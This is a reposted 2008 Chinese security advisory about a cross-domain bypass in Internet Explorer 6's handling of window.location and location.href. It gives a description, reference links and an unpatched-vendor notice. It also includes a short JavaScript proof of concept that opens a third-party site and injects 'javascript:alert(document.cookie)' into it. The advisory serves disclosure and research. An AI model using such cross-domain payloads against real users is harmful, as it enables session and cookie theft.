Microsoft IE location及location.href绕过跨域安全限制漏洞 's

admin 2017年4月18日03:24:36评论447 views字数 1002阅读3分20秒阅读模式
摘要

发布日期:2008-06-26
更新日期:2008-06-27受影响系统:Microsoft Internet Explorer 6.0
– Microsoft Windows XP SP2

发布日期:2008-06-26
更新日期:2008-06-27

受影响系统:

Microsoft Internet Explorer 6.0
– Microsoft Windows XP SP2

描述:BUGTRAQ ID: 29960

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE没有正确地处理窗口对象的location或location.href属性,如果用户受骗访问了恶意站点的话,就会绕过跨域安全限制,在用户浏览器会话中执行任意指令。

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。

<*来源:rayh4c ([email protected]

链接:http://secunia.com/advisories/30857/
http://blogs.zdnet.com/security/?p=1348
http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt
http://www.kb.cert.org/vuls/id/923508
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<a href=””>IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open(‘http://www.phpwind.net&#39;);
setTimeout(function(){
x.location=new String(“javascript:alert(document.cookie)”)
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links.href=”javascript:win()”
}
}
</script>

建议:厂商补丁:

Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月18日03:24:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Microsoft IE location及location.href绕过跨域安全限制漏洞 'shttps://cn-sec.com/archives/45188.html

发表评论

匿名网友 填写信息